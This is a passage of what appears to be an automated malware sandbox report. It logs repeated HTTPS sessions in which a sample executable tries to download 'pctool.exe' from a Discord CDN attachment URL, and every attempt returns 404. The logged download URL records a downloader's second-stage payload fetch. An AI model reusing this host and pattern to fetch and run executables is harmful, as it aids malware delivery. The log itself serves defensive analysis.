                        Set-Cookie: __cf_bm=F7QkNRnc3xmRxVvV9zzcLxtoUTS2rdNMwvk_3Ps6FnU-1736950764-1.0.1.1-C6ZXZxPnOSGKo2g9mwNIGR_7dVlZFK5h7z8FXC2XrPShcBxjW8LXcEWiC58RyO6hwgN.w1HAIrPfFhNBpo9X8A; path=/; expires=Wed, 15-Jan-25 14:49:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPBwSglxSzScbQdpFAjnOB9R9h9mBAAIuJBHJ2AjKkgyuPj6itW6s7%2BEdANTwDFeAwNhUaIHyEGi3rrLAdvDmVp8pgCBKmmwlqqoY5iRhzPUEZF9ftDyvLsGDorEl8E7sEh38A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=POu39wA5Ghdvj4D9Hl0YGjblB8aXaB8A2uv..LFn6aI-1736950764421-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680257e4a424b-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:24 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.25 | 49735 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:29 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:30 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:30 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=B7UkK4GtkILtya7G_fIfzqT9117kKEWh52Lq.xa6qgI-1736950770-1.0.1.1-a31nc6GY8NPoX3fGMV7DfN1vwszl1ShYRoP7pPdfnnFQijT71Qug1GP3QrVu1aiw8Y3vcYB1W4dMXQC5cyq_dA; path=/; expires=Wed, 15-Jan-25 14:49:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaV7niJrZKvuk8F%2FxpMnvY8LETkJkQjfVXm8jtnsCiLDzr7Jk9ipr32pbouqxwmCeW0KoP0Wrp9qwxcM4Cc2%2Baay3ZjmUA3l6FcivZaEnZIIAfVvQ4XF5gqwQL1FhgoTSzOkww%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=U4CKkQsE4PsII0LkNqEhMgsh2RDIjkbCVdZoNaS0z4k-1736950770152-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680496f511a44-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:30 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.25 | 49736 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:35 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:35 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:35 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=uprTm3.rdqNDHsGLmXoeD5os31XvUdElGbN8zdVY1Kc-1736950775-1.0.1.1-8lFUhAZQyZh7OJeFDrmmzX9lgLyREqJstLoUqAj4VvNGImKo9My5g.irmmbHQzwyyFRXOqnRKWEf5nESsiTq.A; path=/; expires=Wed, 15-Jan-25 14:49:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nY25hL6k12sD6ARwpu8nhmN4WsuIYJku%2BAHoRiaSrak27R7qZRsCdR3Dag9OWvNKLhd3eNqtaTCuDXuyfxz0cl7NUTmyxGy8gtGGErqosZzNHQgM4NxZYx2KhbYcVdhbhYDSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=B72tlU.oza_HDZg0eHNbSF94ssgzgtXCDrEZP9LxnUE-1736950775812-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026806cab59423d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:35 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.25 | 49738 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:41 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:41 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:41 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=1N7q009Mtt52yC.CZlTkZEXpS8649t56uF_4onAoTt4-1736950781-1.0.1.1-a.rdge3J9PmX3wQfsNh98lNuiaKzg1X34yCoS_LqjRihTDd5GOOuaYzorAWauNg25I0zJIi5Sxriw_ceu6IT1Q; path=/; expires=Wed, 15-Jan-25 14:49:41 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3UWDBRY68vPGsE4igMBEJnQawfCOlfpSToi3e9A3XxkvX6D7BTzeiBA7IolYcgss3uByjGfsODvoKcQeumzXW%2FYic9gBy1%2BdxT7kDPdduG9I8XE8ybrrIvXJNApyRoWiE98lrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=rjQXGKTE85o9vJzb7ELI88RRk.mdgQq43vjhit8C_nY-1736950781451-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026808ff8990caa-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:41 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.25 | 49739 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:46 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:47 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:47 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=MzDQi9ztFHvIdQHiG7Uf.GXAhRJarpmC3nYaRolKKCI-1736950787-1.0.1.1-YTOoZgXtLSXd0vTcuV10zlO3qnEH7Q9QdwPgGXX9eSmb0JNIZ87aK8zcJYe.OGDRpJmZVKHsQXJ2RgS_0GL8Cg; path=/; expires=Wed, 15-Jan-25 14:49:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqnFmQEuhP2VLMBZzQVq%2BVd1iY7f%2BvZFE4QjdCT5wYrQ8Z1DXK3fjctP5iJubR%2Fd1piCVsFBYbPGPuonEj6SzwqDmzfYsz9FxiCilYKRvr%2Bj0wWKwOxFi9W6fmIpjUfJIOyGqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=hnZOMiZFSap9o9bTcGOoDQCDX7fFhWn7E53xyTtKOHw-1736950787105-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680b34bc97d0e-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:47 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.25 | 49740 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:52 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:52 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:52 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=lNKfaC2TEbfMiOwZP7Fxe_lJSEiVta5.xiBHArWvc5Q-1736950792-1.0.1.1-R2V7ERQ5ZNXBBK3_VhxcAdPp2nFYou1CAEhRC2R2h3yQCfXgtrfN0V2EGez1b7Hln17wWUp7E7kT8DrilTR_cA; path=/; expires=Wed, 15-Jan-25 14:49:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0TsyRA2kFJzPjgQAowS34ZbSqXqk54slGKwnefNTDm9yZdZmP2048GHS1tJ%2BjLDgjS9RkXEmUvDqnYCZUVvlATfKRtcNWrNzV9LyEz%2FLrM283qMx08XaxgqVgVZOWW9%2ByDUmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=u5GnG4svosxxoWUNHaxTQfKqDZjIdJkrmKCB_ntVdqM-1736950792739-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680d67e570f64-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:52 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.25 | 49741 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:19:58 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:19:58 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:19:58 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=_WvrAmrf.4WF8tWKWd3C.C6FumlTAM9lUTEWFpDIwGQ-1736950798-1.0.1.1-jRs_qSpaGGqtz7RuCPZLMlYSdFUKCOr1GVunT_bLz74_0LCT1zbTLtQNTTrtuCG.h1HwEXvHXZShkqVavSoZVQ; path=/; expires=Wed, 15-Jan-25 14:49:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASiz4XTLCrcPtl9OAg%2F8%2FAMN1KWYzU75wMaIKONAeTlaCMKnJhg61kTeGoYpyhdj6HmUDSJ5JA6hcpt8tkIgbqiEepaixeBKMEcbwsQktl0YNyYzS9FVMJ6jK5lJP4Qw%2FW48GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=sDhtZjVnAi4AE1dr5BdJHo0ey6XaYXxvXXWvMakjUEs-1736950798556-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902680faeaf6435c-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:19:58 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.25 | 49742 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:04 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:04 UTC | 1053 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:04 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=H1Dexhu4JzEUxvyB7YbljRf0G6T2hLVOv3mCtZKwkDQ-1736950804-1.0.1.1-l2xlDpYeV8xBHeX6omdbl.k61dhM7rDOJzcnyFPiQW6zb0KTSCPhajcuYQvbsE0jaZiZpc_PtEHHCBpcD3ENmQ; path=/; expires=Wed, 15-Jan-25 14:50:04 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSlAl%2FNYLXWX7KzhCVePGyxnG%2BiCcpFDygE%2BaYLU3IF86N92jtubWGPO2aXgGFnBeqGgas7WCp5WxeJUebOM0hExbMXiNB0wtYo3EXblGu60Yr%2FodH42LD0ws3QMFr0Xx%2Bt%2Byw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=nRll.bKkLGIMTmiv2QOujFp_OKpcKwKC41BY2F9bp78-1736950804216-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 9026811e2f6b8c35-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:04 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.25 | 49743 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:09 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:09 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:09 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=ZozhuvHALTBimgv2je7sbcOA.lMIES7H.kZGJgNg8R8-1736950809-1.0.1.1-9meGAXWb1_H_KkFb9_Ae9pYYGEsdk.eq6yFXtzVr249zQ3eu8YbaYW7hd5jBK45Kv73H4eoZABk.uF_rJy9eyw; path=/; expires=Wed, 15-Jan-25 14:50:09 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kx2xAuskwbnyrib%2Bhd24jx%2FN08Pbd52sUwbb7EamwURQqzIS5rUv1WcWDd6ukpMQInZDGXh8hDRVvsXREz%2BDWk9ZiNvvX9wlJkS0n6KNYtiJSi%2BGL90Ui3C8m1TZAvtS0yssMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=K7wT8PTQFP._poRX9gQyZV5Uu_pdd9NBk74CimckA2s-1736950809855-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681417eb10f51-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:09 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.25 | 49744 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:15 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:15 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:15 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=JhWviOr9jA9Mo2J3o36fFs5ezZBL6HKAQrI0NztTRjI-1736950815-1.0.1.1-snVCJZrnhBc4E2x2BhtdEFwI7Fc6xmrHOJhPBT.Guws5pMyOJYeaIKTnAEk.e9ZYT7RPIHizHIhcqQvuJGbz_g; path=/; expires=Wed, 15-Jan-25 14:50:15 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvDSWyOR1msblA8Rfjq39VF%2FJNeTlqB%2Bl2nzll6%2FhkLjy9DsYtkZ2mnmgBwdWQd9kHxDzads0yGNdhEI6yuT32NzKCqVnIbGGWLJDK7PdVcHkL%2Bxua7iuLaV1bV0%2BaR44xS1Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Yk_2NcWuUeBmZMeuhusLDf1IiQpn8NaCk2abqmPC7YU-1736950815552-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681650f7941ad-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:15 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.25 | 49745 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:21 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:21 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:21 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=nqFuALMBfisM3lIVDdsOy_DEkXnf3QE_PLkNSjK9lII-1736950821-1.0.1.1-TwxFchA2.SwIS4oislvu0fxa1n74YYfcKaj.6nGLE7VjLTsrEi6VOHqjn7rnk.H5w7v.VwhGr7cDNKPPCopwsw; path=/; expires=Wed, 15-Jan-25 14:50:21 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W9IbHHFHH3947aZqXOojLAzwt5MmxTsbF2s8iUniVmox0lYwcqqy9DiKnDaRqnK5Ek1761Vvy%2FfpIbCboYEmgj6ESMOuX8BL4paX9nIWX%2FLfMl%2FePH7WNp91a%2FUyCTxKuX572g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=qoQmv4GSljrIDDXGHGqodNFfOl4B01zYcfwlUkwF28c-1736950821170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681883cfb0f83-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:21 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.25 | 49746 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:26 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:26 UTC | 1047 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:26 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=WYvVTYXajXDWcuHw3QxgDBKSHaxYMlrmQajqIv8.kKs-1736950826-1.0.1.1-N2VSUOMA_UFq9QfSCil0E.jcgU0DrDnHuxW5w2Pp2Oba_Njk2LZbBY2MfghU537Fdd.NdXrmWZjLGITV6wPKCg; path=/; expires=Wed, 15-Jan-25 14:50:26 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0fL2WRRzQdSBdkW6IyzLHjXGnH8R8u31eINGWyicK8laXzm28HpiSB7SeKTeG%2BgVMyg%2F0jXOE33tiyPG5qJDKULyefmF%2BhuzDw2yQKLQOHh0rsdGNrgEnbZBiJGTswaJBi1PYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=vX4_Pypk94h3LEqoVxquaPGB5AUVw81t02JFcmK3zMc-1736950826848-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681ab688172a1-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:26 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.25 | 49747 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:32 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:32 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:32 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=lKCH4U43LyvluZZ1_moWWdMRp9mlmUmNEzQaiSj5h6A-1736950832-1.0.1.1-ly.OBNYNf8kgRJiCLlU2XXUamLdJLFLTbU_nI_jOJ6A_2oKYEVxVGEQwKGdWgqQx5epwRFOWr5VtpE97nBAmWw; path=/; expires=Wed, 15-Jan-25 14:50:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQmT5g4hJ6sT9pOoEMIeTMY7YfaUjKWUauX71ggdgKoA1QuwQ5SNlfHtXZC9%2F3%2F%2Fv%2FZpmeT8bVR828GECqahyvadXupRPRMusO3m%2FqrpgKjOi3AoESOyOHacDKUk7DXYesaBqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=YZTKzOvy_7W0XQ0CU2oHTGRGHCLBEyzdibgKIPNHNsg-1736950832453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681cebd73184d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-01-15 14:20:32 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                        Data Ascii: This content is no longer available.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.25 | 49748 | 162.159.134.233 | 443 | 8064 | C:\Users\user\Desktop\Sample1.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-15 14:20:38 UTC | 104 | OUT | GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
                        Host: cdn.discordapp.com
                        2025-01-15 14:20:38 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                        Date: Wed, 15 Jan 2025 14:20:38 GMT
                        Content-Type: text/plain;charset=UTF-8
                        Content-Length: 36
                        Connection: close
                        Set-Cookie: __cf_bm=5IVWCrP66ri2uMnu1eOemMOffPzHg55KuVK7HOn_yyQ-1736950838-1.0.1.1-DvEuJKHW0DscPHrbKdLOvCsp0M.g7sTsmSY4TORRPeGkqaW4YFglYFErzIVyvsa5cCzt5PGUt.DUTUyOQVJaJw; path=/; expires=Wed, 15-Jan-25 14:50:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=406pDaN8%2BOqqyr4yECVzUzJMxbwzmRChf27eLqM%2FTFsu%2BVuNX3mWkoO%2BX47%2FE4j0FKZqJF9gnfmiZCfk0gE2fcfyCOeah8cfaIZljShUxazcXxjlsuFKqnz7w2h7HxU0W14ABg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                        Set-Cookie: _cfuvid=Hi9JTkbN9C2m_.FH4H3EDQdiLs6wVi7emDpNS6P5tWw-1736950838179-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Server: cloudflare
                        CF-RAY: 902681f28dda0c84-EWR
                        alt-svc: h3=":443"; ma=86400
